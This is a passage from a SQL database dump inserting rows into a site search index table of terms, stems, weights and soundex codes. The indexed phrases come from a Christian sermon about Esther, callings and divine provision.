(328061, 'relationships whether it', 'relationship whether it', 0, 1, 1.8, 'R435212363', 1, '*'),
(328062, 'religion so', 'religion so', 0, 1, 1.3667, 'R4252', 1, '*'),
(328063, 'religion so that', 'religion so that', 0, 1, 1.5333, 'R42523', 1, '*'),
(328064, 'require a helicopter', 'requir a helicopter', 0, 1, 1.6667, 'R2642136', 1, '*'),
(328065, 'requires a', 'requir a', 0, 1, 1.3333, 'R262', 1, '*'),
(328066, 'requires a helicopter', 'requir a helicopter', 0, 1, 1.7, 'R26242136', 1, '*'),
(328067, 'requires that is', 'requir that is', 0, 1, 1.5333, 'R26232', 1, '*'),
(328068, 'return you', 'return you', 0, 1, 1.3333, 'R365', 1, '*'),
(328069, 'return you know', 'return you know', 0, 1, 1.5, 'R36525', 1, '*'),
(328070, 'said i should', 'said i should', 0, 1, 1.4333, 'S3243', 1, '*'),
(328071, 'said “...', 'said “...', 0, 1, 1.3, 'S300', 1, '*'),
(328072, 'said “... maybe', 'said “... maybe', 0, 1, 1.5, 'S351', 1, '*'),
(328073, 'salary of', 'salari of', 0, 1, 1.3, 'S461', 1, '*'),
(328074, 'salary of the', 'salari of the', 0, 1, 1.4333, 'S4613', 1, '*'),
(328075, 'salvation is the', 'salvat is the', 0, 1, 1.5333, 'S413523', 1, '*'),
(328076, 'same as', 'same as', 0, 1, 1.2333, 'S520', 1, '*'),
(328077, 'same as job', 'same as job', 0, 1, 1.3667, 'S521', 1, '*'),
(328078, 'saying “it', 'sai “it', 0, 1, 1.3333, 'S523', 1, '*'),
(328079, 'saying “it means', 'sai “it means', 0, 1, 1.5333, 'S52352', 1, '*'),
(328080, 'secondly i', 'secondli i', 0, 1, 1.3333, 'S534', 1, '*'),
(328081, 'secondly i was', 'secondli i was', 0, 1, 1.4667, 'S5342', 1, '*'),
(328082, 'see and', 'see and', 0, 1, 1.2333, 'S530', 1, '*'),
(328083, 'see and it', 'see and it', 0, 1, 1.3333, 'S530', 1, '*'),
(328084, 'see in people\'s', 'see in people', 0, 1, 1.5, 'S5142', 1, '*'),
(328085, 'see will', 'see will', 0, 1, 1.2667, 'S400', 1, '*'),
(328086, 'see will be', 'see will be', 0, 1, 1.3667, 'S410', 1, '*'),
(328087, 'sell my', 'sell my', 0, 1, 1.2333, 'S450', 1, '*'),
(328088, 'sell my car', 'sell my car', 0, 1, 1.3667, 'S4526', 1, '*'),
(328089, 'senator', 'senat', 0, 0, 0.4667, 'S536', 1, '*'),
(328090, 'senator a', 'senat a', 0, 1, 1.3, 'S536', 1, '*'),
(328091, 'senator a businessman', 'senat a businessman', 0, 1, 1.7, 'S53612525', 1, '*'),
(328092, 'send one', 'send one', 0, 1, 1.2667, 'S535', 1, '*'),
(328093, 'send one whatever', 'send one whatever', 0, 1, 1.5667, 'S535316', 1, '*'),
(328094, 'sensitive about', 'sensit about', 0, 1, 1.5, 'S52313', 1, '*'),
(328095, 'sensitive about that', 'sensit about that', 0, 1, 1.6667, 'S52313', 1, '*'),
(328096, 'serve the purpose', 'serv the purpose', 0, 1, 1.5667, 'S6131612', 1, '*'),
(328097, 'service the car', 'servic the car', 0, 1, 1.5, 'S612326', 1, '*'),
(328098, 'service them', 'servic them', 0, 1, 1.4, 'S61235', 1, '*'),
(328099, 'service them o', 'servic them o', 0, 1, 1.4667, 'S61235', 1, '*'),
(328100, 'servicing', 'servic', 0, 0, 0.6, 'S61252', 1, '*'),
(328101, 'servicing those', 'servic those', 0, 1, 1.5, 'S6125232', 1, '*'),
(328102, 'servicing those accounts', 'servic those accounts', 0, 1, 1.8, 'S6125232532', 1, '*'),
(328103, 'settle down and', 'settl down and', 0, 1, 1.5, 'S34353', 1, '*'),
(328104, 'seven accounts', 'seven accounts', 0, 1, 1.4667, 'S152532', 1, '*'),
(328105, 'seven accounts you', 'seven accounts you', 0, 1, 1.6, 'S152532', 1, '*'),
(328106, 'she had', 'she had', 0, 1, 1.2333, 'S300', 1, '*'),
(328107, 'she had to', 'she had to', 0, 1, 1.3333, 'S300', 1, '*'),
(328108, 'she said', 'she said', 0, 1, 1.2667, 'S300', 1, '*'),
(328109, 'she said i', 'she said i', 0, 1, 1.3333, 'S300', 1, '*'),
(328110, 'she was about', 'she was about', 0, 1, 1.4333, 'S130', 1, '*'),
(328111, 'should give', 'should give', 0, 1, 1.3667, 'S4321', 1, '*'),
(328112, 'should give her', 'should give her', 0, 1, 1.5, 'S43216', 1, '*'),
(328113, 'should sell', 'should sell', 0, 1, 1.3667, 'S4324', 1, '*'),
(328114, 'should sell my', 'should sell my', 0, 1, 1.4667, 'S43245', 1, '*'),
(328115, 'showed me his', 'show me his', 0, 1, 1.4333, 'S352', 1, '*'),
(328116, 'sinner and put', 'sinner and put', 0, 1, 1.4667, 'S565313', 1, '*'),
(328117, 'sister', 'sister', 0, 0, 0.4, 'S360', 1, '*'),
(328118, 'sister who', 'sister who', 0, 1, 1.3333, 'S360', 1, '*'),
(328119, 'sister who was', 'sister who was', 0, 1, 1.4667, 'S362', 1, '*'),
(328120, 'small or', 'small or', 0, 1, 1.2667, 'S546', 1, '*'),
(328121, 'small or big', 'small or big', 0, 1, 1.4, 'S54612', 1, '*'),
(328122, 'so and', 'so and', 0, 1, 1.2, 'S530', 1, '*'),
(328123, 'so and that', 'so and that', 0, 1, 1.3667, 'S530', 1, '*'),
(328124, 'so as', 'so as', 0, 1, 1.1667, 'S000', 1, '*'),
(328125, 'so as to', 'so as to', 0, 1, 1.2667, 'S300', 1, '*'),
(328126, 'so that he', 'so that he', 0, 1, 1.3333, 'S300', 1, '*'),
(328127, 'so you must', 'so you must', 0, 1, 1.3667, 'S523', 1, '*'),
(328128, 'sold my', 'sold my', 0, 1, 1.2333, 'S435', 1, '*'),
(328129, 'sold my car', 'sold my car', 0, 1, 1.3667, 'S43526', 1, '*'),
(328130, 'solomon had', 'solomon had', 0, 1, 1.3667, 'S453', 1, '*'),
(328131, 'solomon had that', 'solomon had that', 0, 1, 1.5333, 'S453', 1, '*'),
(328132, 'something for', 'someth for', 0, 1, 1.4333, 'S535216', 1, '*'),
(328133, 'something for him', 'someth for him', 0, 1, 1.5667, 'S5352165', 1, '*'),
(328134, 'something he', 'someth he', 0, 1, 1.4, 'S5352', 1, '*'),
(328135, 'something he gives', 'someth he gives', 0, 1, 1.6, 'S535212', 1, '*'),
(328136, 'something he isgoing', 'someth he isgoing', 0, 1, 1.6667, 'S535252', 1, '*'),
(328137, 'somewhere but', 'somewher but', 0, 1, 1.4333, 'S5613', 1, '*'),
(328138, 'somewhere but along', 'somewher but along', 0, 1, 1.6333, 'S5613452', 1, '*'),
(328139, 'speak to the', 'speak to the', 0, 1, 1.4, 'S123', 1, '*'),
(328140, 'speaking through', 'speak through', 0, 1, 1.5333, 'S1252362', 1, '*'),
(328141, 'speaking through that', 'speak through that', 0, 1, 1.7, 'S12523623', 1, '*'),
(328142, 'spirit and put', 'spirit and put', 0, 1, 1.4667, 'S1635313', 1, '*'),
(328143, 'start to walk', 'start to walk', 0, 1, 1.4333, 'S36342', 1, '*'),
(328144, 'steps divine', 'step divine', 0, 1, 1.4, 'S312315', 1, '*'),
(328145, 'steps divine provision', 'step divine provision', 0, 1, 1.7333, 'S31231516125', 1, '*'),
(328146, 'strength of our', 'strength of our', 0, 1, 1.5, 'S3652316', 1, '*'),
(328147, 'strong is', 'strong is', 0, 1, 1.3, 'S3652', 1, '*'),
(328148, 'strong is your', 'strong is your', 0, 1, 1.4667, 'S36526', 1, '*'),
(328149, 'suffering but', 'suffer but', 0, 1, 1.4333, 'S165213', 1, '*'),
(328150, 'suffering but you', 'suffer but you', 0, 1, 1.5667, 'S165213', 1, '*'),
(328151, 'supernaturally', 'supernatur', 0, 0, 0.9333, 'S165364', 1, '*'),
(328152, 'supernaturally and', 'supernatur and', 0, 1, 1.6, 'S16536453', 1, '*'),
(328153, 'supernaturally and miraculously', 'supernatur and miraculously', 0, 1, 2, 'S16536453562424', 1, '*'),
(328154, 'sure that god', 'sure that god', 0, 1, 1.4333, 'S6323', 1, '*'),
(328155, 't ionshi', 't ionshi', 0, 1, 1.2667, 'T520', 1, '*'),
(328156, 't ionshi p', 't ionshi p', 0, 1, 1.3333, 'T521', 1, '*'),
(328157, 't o', 't o', 0, 1, 1.1, 'T000', 1, '*'),
(328158, 't o keep', 't o keep', 0, 1, 1.2667, 'T210', 1, '*'),
(328159, 'take money', 'take money', 0, 1, 1.3333, 'T250', 1, '*'),
(328160, 'take money from', 'take money from', 0, 1, 1.5, 'T25165', 1, '*'),
(328161, 'takes faith', 'take faith', 0, 1, 1.3667, 'T213', 1, '*'),
(328162, 'takes faith to', 'take faith to', 0, 1, 1.4667, 'T213', 1, '*'),
(328163, 'tells us', 'tell us', 0, 1, 1.2667, 'T420', 1, '*'),
(328164, 'tells us to', 'tell us to', 0, 1, 1.3667, 'T423', 1, '*'),
(328165, 'tells you', 'tell you', 0, 1, 1.3, 'T420', 1, '*'),
(328166, 'tells you to', 'tell you to', 0, 1, 1.4, 'T423', 1, '*'),
(328167, 'tend to interact', 'tend to interact', 0, 1, 1.5333, 'T5353623', 1, '*'),
(328168, 'testament and', 'testament and', 0, 1, 1.4333, 'T235353', 1, '*'),
(328169, 'testament and he', 'testament and he', 0, 1, 1.5333, 'T235353', 1, '*'),
(328170, 'that account', 'that account', 0, 1, 1.4, 'T253', 1, '*'),
(328171, 'that account rela', 'that account rela', 0, 1, 1.5667, 'T25364', 1, '*'),
(328172, 'that assignment', 'that assignment', 0, 1, 1.5, 'T253', 1, '*'),
(328173, 'that assignment if', 'that assignment if', 0, 1, 1.6, 'T2531', 1, '*'),
(328174, 'that belong', 'that belong', 0, 1, 1.3667, 'T1452', 1, '*'),
(328175, 'that belong to', 'that belong to', 0, 1, 1.4667, 'T14523', 1, '*'),
(328176, 'that calling', 'that calling', 0, 1, 1.4, 'T2452', 1, '*'),
(328177, 'that calling account', 'that calling account', 0, 1, 1.6667, 'T245253', 1, '*'),
(328178, 'that gave', 'that gave', 0, 1, 1.3, 'T210', 1, '*'),
(328179, 'that gave him', 'that gave him', 0, 1, 1.4333, 'T215', 1, '*'),
(328180, 'that god called', 'that god called', 0, 1, 1.5, 'T23243', 1, '*'),
(328181, 'that god can', 'that god can', 0, 1, 1.4, 'T2325', 1, '*'),
(328182, 'that god said', 'that god said', 0, 1, 1.4333, 'T2323', 1, '*'),
(328183, 'that god will', 'that god will', 0, 1, 1.4333, 'T234', 1, '*'),
(328184, 'that god would', 'that god would', 0, 1, 1.4667, 'T2343', 1, '*'),
(328185, 'that he could', 'that he could', 0, 1, 1.4333, 'T243', 1, '*'),
(328186, 'that help', 'that help', 0, 1, 1.3, 'T410', 1, '*'),
(328187, 'that help my', 'that help my', 0, 1, 1.4, 'T415', 1, '*'),
(328188, 'that i mentor', 'that i mentor', 0, 1, 1.4333, 'T536', 1, '*'),
(328189, 'that instructions', 'that instructions', 0, 1, 1.5667, 'T52362352', 1, '*'),
(328190, 'that instructions in', 'that instructions in', 0, 1, 1.6667, 'T523623525', 1, '*'),
(328191, 'that lady', 'that lady', 0, 1, 1.3, 'T430', 1, '*'),
(328192, 'that lady but', 'that lady but', 0, 1, 1.4333, 'T4313', 1, '*'),
(328193, 'that my assignment', 'that my assignment', 0, 1, 1.6, 'T5253', 1, '*'),
(328194, 'that place correctly', 'that place correctly', 0, 1, 1.6667, 'T1426234', 1, '*'),
(328195, 'that solomon', 'that solomon', 0, 1, 1.4, 'T245', 1, '*'),
(328196, 'that solomon had', 'that solomon had', 0, 1, 1.5333, 'T2453', 1, '*'),
(328197, 'that time', 'that time', 0, 1, 1.3, 'T500', 1, '*'),
(328198, 'that time did', 'that time did', 0, 1, 1.4333, 'T530', 1, '*'),
(328199, 'that was speaking', 'that was speaking', 0, 1, 1.5667, 'T21252', 1, '*'),
(328200, 'that we live', 'that we live', 0, 1, 1.4, 'T410', 1, '*'),
(328201, 'that while', 'that while', 0, 1, 1.3333, 'T400', 1, '*'),
(328202, 'that while we', 'that while we', 0, 1, 1.4333, 'T400', 1, '*'),
(328203, 'that you do', 'that you do', 0, 1, 1.3667, 'T000', 1, '*'),
(328204, 'that you see', 'that you see', 0, 1, 1.4, 'T200', 1, '*'),
(328205, 'that\'s crazy', 'that crazy', 0, 1, 1.4, 'T262', 1, '*'),
(328206, 'that\'s crazy if', 'that crazy if', 0, 1, 1.5, 'T2621', 1, '*'),
(328207, 'the accounts', 'the accounts', 0, 1, 1.4, 'T2532', 1, '*'),
(328208, 'the accounts these', 'the accounts these', 0, 1, 1.6, 'T253232', 1, '*'),
(328209, 'the anointing makes', 'the anointing makes', 0, 1, 1.6333, 'T535252', 1, '*'),
(328210, 'the assignment for', 'the assignment for', 0, 1, 1.6, 'T25316', 1, '*'),
(328211, 'the assignment god', 'the assignment god', 0, 1, 1.6, 'T25323', 1, '*'),
(328212, 'the assignment he', 'the assignment he', 0, 1, 1.5667, 'T253', 1, '*'),
(328213, 'the calling before', 'the calling before', 0, 1, 1.6, 'T245216', 1, '*'),
(328214, 'the calling easy', 'the calling easy', 0, 1, 1.5333, 'T2452', 1, '*'),
(328215, 'the capacity to', 'the capacity to', 0, 1, 1.5, 'T2123', 1, '*'),
(328216, 'the car', 'the car', 0, 1, 1.2333, 'T260', 1, '*'),
(328217, 'the car i', 'the car i', 0, 1, 1.3, 'T260', 1, '*'),
(328218, 'the clout', 'the clout', 0, 1, 1.3, 'T243', 1, '*'),
(328219, 'the clout and', 'the clout and', 0, 1, 1.4333, 'T24353', 1, '*'),
(328220, 'the directions', 'the directions', 0, 1, 1.4667, 'T62352', 1, '*'),
(328221, 'the directions of', 'the directions of', 0, 1, 1.5667, 'T623521', 1, '*'),
(328222, 'the disciplines', 'the disciplines', 0, 1, 1.5, 'T21452', 1, '*'),
(328223, 'the disciplines of', 'the disciplines of', 0, 1, 1.6, 'T214521', 1, '*'),
(328224, 'the divinely', 'the divinely', 0, 1, 1.4, 'T154', 1, '*'),
(328225, 'the divinely assisted', 'the divinely assisted', 0, 1, 1.7, 'T15423', 1, '*'),
(328226, 'the earth requires', 'the earth requires', 0, 1, 1.6, 'T636262', 1, '*'),
(328227, 'the feebleness', 'the feebleness', 0, 1, 1.4667, 'T1452', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(328228, 'the feebleness of', 'the feebleness of', 0, 1, 1.5667, 'T14521', 1, '*'),
(328229, 'the helicopter', 'the helicopter', 0, 1, 1.4667, 'T42136', 1, '*'),
(328230, 'the helicopter when', 'the helicopter when', 0, 1, 1.6333, 'T421365', 1, '*'),
(328231, 'the jewish', 'the jewish', 0, 1, 1.3333, 'T200', 1, '*'),
(328232, 'the jewish religion', 'the jewish religion', 0, 1, 1.6333, 'T26425', 1, '*'),
(328233, 'the king to', 'the king to', 0, 1, 1.3667, 'T2523', 1, '*'),
(328234, 'the king\'s palace', 'the king palace', 0, 1, 1.5667, 'T252142', 1, '*'),
(328235, 'the kingdom settle', 'the kingdom settle', 0, 1, 1.6, 'T25235234', 1, '*'),
(328236, 'the marks', 'the marks', 0, 1, 1.3, 'T562', 1, '*'),
(328237, 'the marks of', 'the marks of', 0, 1, 1.4, 'T5621', 1, '*'),
(328238, 'the meaning', 'the meaning', 0, 1, 1.3667, 'T520', 1, '*'),
(328239, 'the meaning to', 'the meaning to', 0, 1, 1.4667, 'T523', 1, '*'),
(328240, 'the ministry of', 'the ministry of', 0, 1, 1.5, 'T52361', 1, '*'),
(328241, 'the obedience', 'the obedience', 0, 1, 1.4333, 'T1352', 1, '*'),
(328242, 'the obedience of', 'the obedience of', 0, 1, 1.5333, 'T13521', 1, '*'),
(328243, 'the one i\'m', 'the one i', 0, 1, 1.3667, 'T500', 1, '*'),
(328244, 'the past to', 'the past to', 0, 1, 1.3667, 'T123', 1, '*'),
(328245, 'the people and', 'the people and', 0, 1, 1.4667, 'T1453', 1, '*'),
(328246, 'the people of', 'the people of', 0, 1, 1.4333, 'T141', 1, '*'),
(328247, 'the pilot', 'the pilot', 0, 1, 1.3, 'T143', 1, '*'),
(328248, 'the pilot and', 'the pilot and', 0, 1, 1.4333, 'T14353', 1, '*'),
(328249, 'the problem of', 'the problem of', 0, 1, 1.4667, 'T161451', 1, '*'),
(328250, 'the purpose for', 'the purpose for', 0, 1, 1.5, 'T161216', 1, '*'),
(328251, 'the queen', 'the queen', 0, 1, 1.3, 'T250', 1, '*'),
(328252, 'the queen of', 'the queen of', 0, 1, 1.4, 'T251', 1, '*'),
(328253, 'the reason why', 'the reason why', 0, 1, 1.4667, 'T625', 1, '*'),
(328254, 'the salary', 'the salary', 0, 1, 1.3333, 'T246', 1, '*'),
(328255, 'the salary of', 'the salary of', 0, 1, 1.4333, 'T2461', 1, '*'),
(328256, 'the same as', 'the same as', 0, 1, 1.3667, 'T252', 1, '*'),
(328257, 'the things i', 'the things i', 0, 1, 1.4, 'T520', 1, '*'),
(328258, 'the throne wrong', 'the throne wrong', 0, 1, 1.5333, 'T65652', 1, '*'),
(328259, 'the wealth', 'the wealth', 0, 1, 1.3333, 'T430', 1, '*'),
(328260, 'the wealth god', 'the wealth god', 0, 1, 1.4667, 'T4323', 1, '*'),
(328261, 'the wisdom', 'the wisdom', 0, 1, 1.3333, 'T235', 1, '*'),
(328262, 'the wisdom account', 'the wisdom account', 0, 1, 1.6, 'T235253', 1, '*'),
(328263, 'their life', 'their life', 0, 1, 1.3333, 'T641', 1, '*'),
(328264, 'their life you', 'their life you', 0, 1, 1.4667, 'T641', 1, '*'),
(328265, 'their suffering', 'their suffering', 0, 1, 1.5, 'T621652', 1, '*'),
(328266, 'their suffering but', 'their suffering but', 0, 1, 1.6333, 'T62165213', 1, '*'),
(328267, 'them is', 'them is', 0, 1, 1.2333, 'T520', 1, '*'),
(328268, 'them is very', 'them is very', 0, 1, 1.4, 'T5216', 1, '*'),
(328269, 'them o', 'them o', 0, 1, 1.2, 'T500', 1, '*'),
(328270, 'them o bedience', 'them o bedience', 0, 1, 1.5, 'T51352', 1, '*'),
(328271, 'then if', 'then if', 0, 1, 1.2333, 'T510', 1, '*'),
(328272, 'then if i', 'then if i', 0, 1, 1.3, 'T510', 1, '*'),
(328273, 'then you are', 'then you are', 0, 1, 1.4, 'T560', 1, '*'),
(328274, 'there are men', 'there are men', 0, 1, 1.4333, 'T650', 1, '*'),
(328275, 'there once', 'there once', 0, 1, 1.3333, 'T652', 1, '*'),
(328276, 'there once you', 'there once you', 0, 1, 1.4667, 'T652', 1, '*'),
(328277, 'there who', 'there who', 0, 1, 1.3, 'T600', 1, '*'),
(328278, 'there who was', 'there who was', 0, 1, 1.4333, 'T620', 1, '*'),
(328279, 'these account', 'these account', 0, 1, 1.4333, 'T253', 1, '*'),
(328280, 'these account now', 'these account now', 0, 1, 1.5667, 'T2535', 1, '*'),
(328281, 'these accounts', 'these accounts', 0, 1, 1.4667, 'T2532', 1, '*'),
(328282, 'these accounts are', 'these accounts are', 0, 1, 1.6, 'T25326', 1, '*'),
(328283, 'these accounts were', 'these accounts were', 0, 1, 1.6333, 'T25326', 1, '*'),
(328284, 'these seven', 'these seven', 0, 1, 1.3667, 'T215', 1, '*'),
(328285, 'these seven accounts', 'these seven accounts', 0, 1, 1.6667, 'T2152532', 1, '*'),
(328286, 'these three', 'these three', 0, 1, 1.3667, 'T236', 1, '*'),
(328287, 'these three periods', 'these three periods', 0, 1, 1.6333, 'T2361632', 1, '*'),
(328288, 'they handle', 'thei handle', 0, 1, 1.3667, 'T534', 1, '*'),
(328289, 'they handle relationships', 'thei handle relationships', 0, 1, 1.8333, 'T5346435212', 1, '*'),
(328290, 'they have wrong', 'thei have wrong', 0, 1, 1.5, 'T1652', 1, '*'),
(328291, 'they may be', 'thei may be', 0, 1, 1.3667, 'T510', 1, '*'),
(328292, 'things i', 'thing i', 0, 1, 1.2667, 'T520', 1, '*'),
(328293, 'things i am', 'thing i am', 0, 1, 1.3667, 'T525', 1, '*'),
(328294, 'think about', 'think about', 0, 1, 1.3667, 'T5213', 1, '*'),
(328295, 'think about that', 'think about that', 0, 1, 1.5333, 'T5213', 1, '*'),
(328296, 'think that god', 'think that god', 0, 1, 1.4667, 'T52323', 1, '*'),
(328297, 'this 36th', 'thi 36th', 0, 1, 1.3, 'T230', 1, '*'),
(328298, 'this 36th year', 'thi 36th year', 0, 1, 1.4667, 'T236', 1, '*'),
(328299, 'this her', 'thi her', 0, 1, 1.2667, 'T260', 1, '*'),
(328300, 'this her being', 'thi her being', 0, 1, 1.4667, 'T26152', 1, '*'),
(328301, 'this hour', 'thi hour', 0, 1, 1.3, 'T260', 1, '*'),
(328302, 'this hour this', 'thi hour this', 0, 1, 1.4667, 'T2632', 1, '*'),
(328303, 'this is his', 'thi is his', 0, 1, 1.3667, 'T200', 1, '*'),
(328304, 'this....”', 'this....”', 0, 0, 0.6, 'T200', 1, '*'),
(328305, 'this....” mordecai', 'this....” mordecai', 0, 1, 1.6, 'T25632', 1, '*'),
(328306, 'this....” mordecai was', 'this....” mordecai was', 0, 1, 1.7333, 'T25632', 1, '*'),
(328307, 'those accounts', 'those accounts', 0, 1, 1.4667, 'T2532', 1, '*'),
(328308, 'those accounts and', 'those accounts and', 0, 1, 1.6, 'T253253', 1, '*'),
(328309, 'those accounts f', 'those accounts f', 0, 1, 1.5333, 'T25321', 1, '*'),
(328310, 'those changes', 'those changes', 0, 1, 1.4333, 'T252', 1, '*'),
(328311, 'those changes w', 'those changes w', 0, 1, 1.5, 'T252', 1, '*'),
(328312, 'three periods', 'three periods', 0, 1, 1.4333, 'T61632', 1, '*'),
(328313, 'three periods yesterday', 'three periods yesterday', 0, 1, 1.7667, 'T61632363', 1, '*'),
(328314, 'throne wrong', 'throne wrong', 0, 1, 1.4, 'T65652', 1, '*'),
(328315, 'throne wrong discipleship', 'throne wrong discipleship', 0, 1, 1.8333, 'T65652321421', 1, '*'),
(328316, 'through that lady', 'through that lady', 0, 1, 1.5667, 'T62343', 1, '*'),
(328317, 'time as this....”', 'time as this....”', 0, 1, 1.5667, 'T5232', 1, '*'),
(328318, 'time did', 'time did', 0, 1, 1.2667, 'T530', 1, '*'),
(328319, 'time did not', 'time did not', 0, 1, 1.4, 'T5353', 1, '*'),
(328320, 'time for her', 'time for her', 0, 1, 1.4, 'T516', 1, '*'),
(328321, 'timed', 'time', 0, 0, 0.3333, 'T530', 1, '*'),
(328322, 'timed designed', 'time designed', 0, 1, 1.4667, 'T53253', 1, '*'),
(328323, 'timed designed arrival', 'time designed arrival', 0, 1, 1.7333, 'T53253614', 1, '*'),
(328324, 'to all your', 'to all your', 0, 1, 1.3667, 'T460', 1, '*'),
(328325, 'to assignment there', 'to assignment there', 0, 1, 1.6333, 'T2536', 1, '*'),
(328326, 'to be born', 'to be born', 0, 1, 1.3333, 'T165', 1, '*'),
(328327, 'to be sensitive', 'to be sensitive', 0, 1, 1.5, 'T125231', 1, '*'),
(328328, 'to become queen', 'to become queen', 0, 1, 1.5, 'T12525', 1, '*'),
(328329, 'to buy', 'to buy', 0, 1, 1.2, 'T100', 1, '*'),
(328330, 'to buy land', 'to buy land', 0, 1, 1.3667, 'T1453', 1, '*'),
(328331, 'to cast your', 'to cast your', 0, 1, 1.4, 'T236', 1, '*'),
(328332, 'to counter', 'to counter', 0, 1, 1.3333, 'T2536', 1, '*'),
(328333, 'to counter haman\'s', 'to counter haman', 0, 1, 1.6, 'T253652', 1, '*'),
(328334, 'to do so', 'to do so', 0, 1, 1.2667, 'T200', 1, '*'),
(328335, 'to fuel', 'to fuel', 0, 1, 1.2333, 'T140', 1, '*'),
(328336, 'to fuel and', 'to fuel and', 0, 1, 1.3667, 'T1453', 1, '*'),
(328337, 'to go with', 'to go with', 0, 1, 1.3333, 'T230', 1, '*'),
(328338, 'to handle relationships', 'to handle relationships', 0, 1, 1.7667, 'T5346435212', 1, '*'),
(328339, 'to have become', 'to have become', 0, 1, 1.4667, 'T125', 1, '*'),
(328340, 'to interact', 'to interact', 0, 1, 1.3667, 'T53623', 1, '*'),
(328341, 'to interact beyond', 'to interact beyond', 0, 1, 1.6, 'T53623153', 1, '*'),
(328342, 'to interact with', 'to interact with', 0, 1, 1.5333, 'T53623', 1, '*'),
(328343, 'to look at', 'to look at', 0, 1, 1.3333, 'T423', 1, '*'),
(328344, 'to manage', 'to manage', 0, 1, 1.3, 'T520', 1, '*'),
(328345, 'to manage those', 'to manage those', 0, 1, 1.5, 'T5232', 1, '*'),
(328346, 'to miss', 'to miss', 0, 1, 1.2333, 'T520', 1, '*'),
(328347, 'to miss it', 'to miss it', 0, 1, 1.3333, 'T523', 1, '*'),
(328348, 'to miss the', 'to miss the', 0, 1, 1.3667, 'T523', 1, '*'),
(328349, 'to nurture', 'to nurture', 0, 1, 1.3333, 'T5636', 1, '*'),
(328350, 'to nurture and', 'to nurture and', 0, 1, 1.4667, 'T563653', 1, '*'),
(328351, 'to one of', 'to one of', 0, 1, 1.3, 'T510', 1, '*'),
(328352, 'to pay the', 'to pay the', 0, 1, 1.3333, 'T130', 1, '*'),
(328353, 'to provide', 'to provide', 0, 1, 1.3333, 'T1613', 1, '*'),
(328354, 'to provide a', 'to provide a', 0, 1, 1.4, 'T1613', 1, '*'),
(328355, 'to recognizecritical', 'to recognizecritical', 0, 1, 1.6667, 'T62526324', 1, '*'),
(328356, 'to recognizecritical relationships', 'to recognizecritical relationships', 0, 1, 2, 'T625263246435212', 1, '*'),
(328357, 'to speak to', 'to speak to', 0, 1, 1.3667, 'T2123', 1, '*'),
(328358, 'to take money', 'to take money', 0, 1, 1.4333, 'T250', 1, '*'),
(328359, 'to the king', 'to the king', 0, 1, 1.3667, 'T252', 1, '*'),
(328360, 'to the kingdom', 'to the kingdom', 0, 1, 1.4667, 'T25235', 1, '*'),
(328361, 'to the past', 'to the past', 0, 1, 1.3667, 'T123', 1, '*'),
(328362, 'to today', 'to today', 0, 1, 1.2667, 'T000', 1, '*'),
(328363, 'to today and', 'to today and', 0, 1, 1.4, 'T530', 1, '*'),
(328364, 'to tomorrow', 'to tomorrow', 0, 1, 1.3667, 'T560', 1, '*'),
(328365, 'to tomorrow and', 'to tomorrow and', 0, 1, 1.5, 'T5653', 1, '*'),
(328366, 'to trace your', 'to trace your', 0, 1, 1.4333, 'T626', 1, '*'),
(328367, 'to use knowledge', 'to use knowledge', 0, 1, 1.5333, 'T25432', 1, '*'),
(328368, 'to use that', 'to use that', 0, 1, 1.3667, 'T230', 1, '*'),
(328369, 'to where you', 'to where you', 0, 1, 1.4, 'T600', 1, '*'),
(328370, 'to you god', 'to you god', 0, 1, 1.3333, 'T230', 1, '*'),
(328371, 'to your advantage', 'to your advantage', 0, 1, 1.5667, 'T631532', 1, '*'),
(328372, 'to your care', 'to your care', 0, 1, 1.4, 'T626', 1, '*'),
(328373, 'today and to', 'todai and to', 0, 1, 1.4, 'T530', 1, '*'),
(328374, 'told her in', 'told her in', 0, 1, 1.3667, 'T4365', 1, '*'),
(328375, 'told me that', 'told me that', 0, 1, 1.4, 'T4353', 1, '*'),
(328376, 'tomorrow and', 'tomorrow and', 0, 1, 1.4, 'T5653', 1, '*'),
(328377, 'tomorrow and distinguish', 'tomorrow and distinguish', 0, 1, 1.8, 'T56532352', 1, '*'),
(328378, 'tomorrow you', 'tomorrow you', 0, 1, 1.4, 'T560', 1, '*'),
(328379, 'tomorrow you have', 'tomorrow you have', 0, 1, 1.5667, 'T561', 1, '*'),
(328380, 'took place', 'took place', 0, 1, 1.3333, 'T2142', 1, '*'),
(328381, 'took place and', 'took place and', 0, 1, 1.4667, 'T214253', 1, '*'),
(328382, 'trace your', 'trace your', 0, 1, 1.3333, 'T626', 1, '*'),
(328383, 'trace your journey', 'trace your journey', 0, 1, 1.6, 'T626265', 1, '*'),
(328384, 'training this', 'train this', 0, 1, 1.4333, 'T65232', 1, '*'),
(328385, 'training this is', 'train this is', 0, 1, 1.5333, 'T65232', 1, '*'),
(328386, 'under the old', 'under the old', 0, 1, 1.4333, 'U536343', 1, '*'),
(328387, 'understand that when', 'understand that when', 0, 1, 1.6667, 'U53623535', 1, '*'),
(328388, 'understand that while', 'understand that while', 0, 1, 1.7, 'U53623534', 1, '*'),
(328389, 'up in the', 'up in the', 0, 1, 1.3, 'U153', 1, '*'),
(328390, 'upon god', 'upon god', 0, 1, 1.2667, 'U1523', 1, '*'),
(328391, 'upon god you', 'upon god you', 0, 1, 1.4, 'U1523', 1, '*'),
(328392, 'us that instructions', 'us that instructions', 0, 1, 1.6667, 'U2352362352', 1, '*'),
(328393, 'us to do', 'us to do', 0, 1, 1.2667, 'U230', 1, '*'),
(328394, 'use knowledge', 'us knowledge', 0, 1, 1.4333, 'U25432', 1, '*'),
(328395, 'use knowledge to', 'us knowledge to', 0, 1, 1.5333, 'U254323', 1, '*'),
(328396, 'use that', 'us that', 0, 1, 1.2667, 'U230', 1, '*'),
(328397, 'use that place', 'us that place', 0, 1, 1.4667, 'U23142', 1, '*'),
(328398, 'using all', 'us all', 0, 1, 1.3, 'U2524', 1, '*'),
(328399, 'using all my', 'us all my', 0, 1, 1.4, 'U25245', 1, '*'),
(328400, 'vashti and', 'vashti and', 0, 1, 1.3333, 'V2353', 1, '*'),
(328401, 'vashti and put', 'vashti and put', 0, 1, 1.4667, 'V235313', 1, '*'),
(328402, 'very important because', 'veri important because', 0, 1, 1.7333, 'V651635312', 1, '*'),
(328403, 'victory not', 'victori not', 0, 1, 1.3667, 'V23653', 1, '*'),
(328404, 'victory not every', 'victori not every', 0, 1, 1.5667, 'V2365316', 1, '*'),
(328405, 'w', 'w', 0, 0, 0.0667, 'W000', 1, '*'),
